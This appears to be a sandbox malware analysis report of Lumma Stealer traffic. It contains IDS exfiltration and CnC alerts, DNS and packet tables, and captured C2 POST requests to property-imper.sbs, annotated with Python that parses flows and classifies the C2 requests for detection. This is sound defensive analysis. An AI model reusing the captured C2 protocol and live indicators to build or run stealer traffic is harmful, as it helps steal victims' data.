2024-11-24T14:56:21.572038+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49702 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:21.572038+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49702 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:23.201819+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49704 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:24.205397+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49704 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:25.561861+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49705 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:28.430843+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49716 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:30.795353+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49722 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:33.237543+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49728 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:33.242954+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.7 | 49728 | 172.67.162.84 | 443 | TCP
2024-11-24T14:56:37.184361+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49743 | 172.67.162.84 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Nov 24, 2024 14:56:20.868989944 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:20.869249105 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:20.876663923 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:20.876703978 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:20.876759052 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572026014 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572060108 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572088003 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572120905 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572127104 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.572144985 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572155952 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.572160959 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.572189093 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.572204113 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.580280066 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.580328941 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.580358028 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.596936941 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.596986055 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.597013950 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.641196012 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.691859961 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.734937906 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.772938013 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.772995949 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.773037910 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.773047924 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.773077011 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.773118019 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.773190975 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.773201942 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.773211956 CET49702443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.773217916 CET44349702172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.888534069 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.888562918 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:21.888675928 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.888987064 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:21.888998032 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:23.201740026 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:23.201818943 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:23.203144073 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:23.203160048 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:23.203494072 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:23.207171917 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:23.207321882 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:23.207355022 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.205430984 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.205530882 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.205614090 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.209427118 CET49704443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.209445953 CET44349704172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.336150885 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.336175919 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:24.336272001 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.336565018 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:24.336581945 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.561767101 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.561861038 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.563644886 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.563651085 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.563905954 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.565243006 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.565452099 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.565485001 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:25.565613985 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:25.607333899 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:26.459044933 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:26.459137917 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:26.459183931 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:26.461832047 CET49705443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:26.461847067 CET44349705172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:27.151926994 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:27.151952982 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:27.152020931 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:27.152350903 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:27.152363062 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.430768013 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.430843115 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.432123899 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.432133913 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.432462931 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.433643103 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.433809996 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.433844090 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:28.433907986 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:28.433914900 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.300137043 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.300379992 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.300456047 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.300605059 CET49716443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.300620079 CET44349716172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.517086983 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.517117977 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:29.517183065 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.517600060 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:29.517616987 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:30.795121908 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:30.795352936 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:30.796761990 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:30.796783924 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:30.797575951 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:30.798957109 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:30.799052954 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:30.799066067 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:31.513550997 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:31.513839006 CET44349722172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:31.513851881 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.513892889 CET49722443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.933514118 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.933533907 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:31.933609009 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.933952093 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:31.933963060 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.237468004 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.237543106 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.238805056 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.238811016 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.239054918 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.240418911 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.241158962 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.241197109 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.241317987 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.241352081 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.242839098 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.242883921 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243015051 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243045092 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243196011 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243232965 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243474960 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243513107 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243521929 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243531942 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243647099 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243665934 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.243685961 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243797064 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.243822098 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291332960 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.291502953 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291524887 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.291553020 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291560888 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.291575909 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291582108 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:33.291699886 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:33.291704893 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.985097885 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.985372066 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.985439062 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.985477924 CET49728443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.985491037 CET44349728172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.995250940 CET49743443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.995270967 CET44349743172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:36.995347977 CET49743443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.995642900 CET49743443192.168.2.7172.67.162.84
                                                                              Nov 24, 2024 14:56:36.995654106 CET44349743172.67.162.84192.168.2.7
                                                                              Nov 24, 2024 14:56:37.184360981 CET49743443192.168.2.7172.67.162.84
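The packet table above shows eight short-lived TLS connections from 192.168.2.7 to 172.67.162.84:443 (client ports 49701 through 49743), each opened roughly two to five seconds after the previous one; this matches the Connection: close responses in the HTTP sessions further down, which force a fresh connection per C2 request. Note also that the packet table is stamped CET while the HTTP session tables below are UTC, one hour earlier. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in the "Timestamp | Source Port | Dest Port | Source IP | Dest IP" layout, regroups them into client flows and measures the gaps between connection starts, which is the beacon cadence an analyst would carry into a detection. The embedded rows are a constructed subset copied from the table (the full 49701 connection plus the first packet of each later connection).

```python
"""Rebuild TCP flows from the sandbox packet table and measure the beacon cadence."""
from collections import OrderedDict
from datetime import datetime

# Constructed sample: the complete 49701 connection plus the opening packet of
# each later connection, copied from the report's packet table.
SAMPLE_ROWS = """\
Nov 24, 2024 14:56:17.583039045 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:17.583086967 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:17.583157063 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:17.592488050 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:17.592504978 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:18.868736982 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:18.868805885 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:18.876765966 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:18.876779079 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:18.877193928 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:18.922429085 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:18.930843115 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:18.930993080 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:18.931082010 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:19.547669888 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:19.547795057 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:19.547844887 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:19.550167084 CET | 49701 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:19.550179005 CET | 443 | 49701 | 172.67.162.84 | 192.168.2.7
Nov 24, 2024 14:56:19.607402086 CET | 49702 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:21.888534069 CET | 49704 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:24.336150885 CET | 49705 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:27.151926994 CET | 49716 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:29.517086983 CET | 49722 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:31.933514118 CET | 49728 | 443 | 192.168.2.7 | 172.67.162.84
Nov 24, 2024 14:56:36.995250940 CET | 49743 | 443 | 192.168.2.7 | 172.67.162.84
"""


def parse_timestamp(text: str) -> datetime:
    # The sandbox prints nanoseconds; strptime's %f accepts at most six digits,
    # so truncate to microseconds and drop the trailing zone name ("CET").
    stamp, _zone = text.rsplit(" ", 1)
    head, frac = stamp.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_rows(table: str):
    """Yield (timestamp, src_port, dst_port, src_ip, dst_ip) per table row."""
    for line in table.strip().splitlines():
        ts, sport, dport, src, dst = (field.strip() for field in line.split("|"))
        yield parse_timestamp(ts), int(sport), int(dport), src, dst


def build_flows(table: str, server_port: int = 443) -> list:
    """Group packets into client flows; the side not on server_port is the client."""
    flows = OrderedDict()
    for ts, sport, dport, src, dst in parse_rows(table):
        if dport == server_port:
            key, outbound = (src, sport, dst, dport), True
        else:
            key, outbound = (dst, dport, src, sport), False
        flow = flows.setdefault(key, {"client_port": key[1], "server": key[2],
                                      "first": ts, "last": ts, "out": 0, "in": 0})
        flow["first"] = min(flow["first"], ts)
        flow["last"] = max(flow["last"], ts)
        flow["out" if outbound else "in"] += 1
    for flow in flows.values():
        flow["duration"] = (flow["last"] - flow["first"]).total_seconds()
    return list(flows.values())


def start_gaps(flows: list) -> list:
    """Seconds between consecutive connection starts: the beacon cadence."""
    starts = sorted(flow["first"] for flow in flows)
    return [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]


if __name__ == "__main__":
    flows = build_flows(SAMPLE_ROWS)
    for flow in flows:
        print(f"{flow['client_port']} -> {flow['server']}:443  "
              f"out={flow['out']} in={flow['in']} duration={flow['duration']:.3f}s")
    print("gaps between connection starts:", [round(g, 2) for g in start_gaps(flows)])
```

Run against the full table the same code gives one flow per client port; the gaps (about 2.0 to 5.1 s here) are what a cadence-based detection would threshold on, and the long 49728 connection, with its burst of outbound packets at 14:56:33, is the one to pull the TLS session for first.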
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 14:56:17.200165987 CET | 62162 | 53 | 192.168.2.7 | 1.1.1.1
Nov 24, 2024 14:56:17.566041946 CET | 53 | 62162 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 14:56:17.200165987 CET | 192.168.2.7 | 1.1.1.1 | 0xd36c | Standard query (0) | property-imper.sbs | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 14:56:17.566041946 CET | 1.1.1.1 | 192.168.2.7 | 0xd36c | No error (0) | property-imper.sbs | | 172.67.162.84 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 14:56:17.566041946 CET | 1.1.1.1 | 192.168.2.7 | 0xd36c | No error (0) | property-imper.sbs | | 104.21.33.116 | A (IP address) | IN (0x0001) | false
                                                                              • property-imper.sbs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 172.67.162.84 | 443 | 7472 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-24 13:56:18 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: property-imper.sbs
2024-11-24 13:56:18 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-24 13:56:19 UTC | 1013 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 13:56:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=iq6dq5rlpu2ncs2gptosfbr4v9; expires=Thu, 20-Mar-2025 07:42:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ljhBezvfy4Ic3eCjJyyXD%2BHn3p6Si%2BL46Y4S2ZVIJQgbHXwIXVSEAVqSi682xtgMKJFl11MZ5L2E8GgITHJzct9BSyDgcjG7P27l9btfeAwXVpySQ8iIK1dvGycbm2c%2BhFjNmDc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e79e6d399963344-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2362&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1576673&cwnd=199&unsent_bytes=0&cid=df1921e0f481e16d&ts=703&x=0"
2024-11-24 13:56:19 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok (chunked encoding: chunk size "2" followed by the two-byte payload "ok"; the CR/LF bytes 0d 0a are not rendered)
2024-11-24 13:56:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (zero-length terminating chunk; the full response body is "ok")
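The two HTTP sessions (this one and the one that follows) show the C2 exchange in the clear: a POST to /api with the form body act=life, answered with a chunked "ok", then a second POST carrying act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j= (the misspelling is what is sent on the wire). The Server: cloudflare and CF-RAY headers show that property-imper.sbs is fronted by Cloudflare, so the resolved address 172.67.162.84 is an edge IP shared with other tenants; the hostname and the request shape are the durable indicators, not the IP. The Python below is an added example, not code from the report or from the sandbox: it rebuilds the two requests from the report's "Data Raw" bytes and header lines (constructed input), parses the form body, decodes the chunked reply, and flags the request pattern. The indicator set (act=life, act=recive_message, ver+lid, empty j) is only what this capture exhibits and is an assumption about what a rule should key on, not a description of the full protocol.

```python
"""Decode and classify the LummaC C2 HTTP exchange captured in the sessions above."""
from urllib.parse import parse_qs

# Constructed from the report's "Data Raw" lines: the 8-byte keepalive body,
# the 53-byte recive_message body (spelling as sent on the wire) and the two
# chunked fragments of the "ok" response, concatenated.
RAW_BODY_LIFE = "61 63 74 3d 6c 69 66 65"
RAW_BODY_RECV = ("61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 "
                 "3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 "
                 "72 61 66 66 69 63 26 6a 3d")
RAW_RESP_BODY = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"

# Request verbs observed in this capture only (assumption: a rule keyed on them).
OBSERVED_ACTS = {"life", "recive_message"}


def build_request(body: bytes, host: str = "property-imper.sbs") -> bytes:
    """Re-create the request as captured; header set copied from the report."""
    lines = [
        b"POST /api HTTP/1.1",
        b"Connection: Keep-Alive",
        b"Content-Type: application/x-www-form-urlencoded",
        b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
        b"Content-Length: " + str(len(body)).encode(),
        b"Host: " + host.encode(),
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def parse_request(raw: bytes) -> dict:
    """Split an HTTP/1.1 request into method, path, headers, body and form fields."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = int(headers.get("content-length", "0"))
    if declared != len(body):
        raise ValueError(f"Content-Length {declared} does not match body ({len(body)} bytes)")
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        # keep_blank_values so the trailing "j=" survives as an empty field
        parsed = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        form = {key: values[0] for key, values in parsed.items()}
    return {"method": method, "path": path, "headers": headers, "body": body, "form": form}


def dechunk(data: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: b"2\\r\\nok\\r\\n0\\r\\n\\r\\n" -> b"ok"."""
    out, pos = bytearray(), 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)   # ignore chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(out)                           # last chunk; trailers ignored
        out += data[pos:pos + size]
        pos += size + 2                                 # skip the CRLF after the data


def c2_indicators(req: dict) -> list:
    """Return the names of the capture's request traits present in req."""
    hits = []
    if req["method"] == "POST" and req["path"] == "/api":
        hits.append("POST /api")
    act = req["form"].get("act")
    if act in OBSERVED_ACTS:
        hits.append(f"act={act}")
    if "ver" in req["form"] and "lid" in req["form"]:
        hits.append("ver+lid")
    if req["form"].get("j") == "":
        hits.append("empty j")
    return hits


def is_lumma_c2(req: dict) -> bool:
    """Minimal verdict: the /api endpoint together with an observed act verb."""
    hits = c2_indicators(req)
    return "POST /api" in hits and any(h.startswith("act=") for h in hits)


if __name__ == "__main__":
    for raw in (RAW_BODY_LIFE, RAW_BODY_RECV):
        req = parse_request(build_request(bytes.fromhex(raw)))
        print(req["form"], c2_indicators(req), is_lumma_c2(req))
    print(dechunk(bytes.fromhex(RAW_RESP_BODY)))
```

The Content-Length check matters in practice: a body-length mismatch is how a proxy or IDS gets desynchronised from what the server actually parsed, so a decoder that silently accepts it will classify the wrong bytes. Because the traffic is TLS to a Cloudflare edge, this logic can only run where the plaintext is available (a sandbox's TLS proxy as here, or an inspecting proxy on the endpoint side); on the wire you are left with the hostname from DNS/SNI and the connection cadence.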


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.749702172.67.162.844437472C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-24 13:56:20 UTC266OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
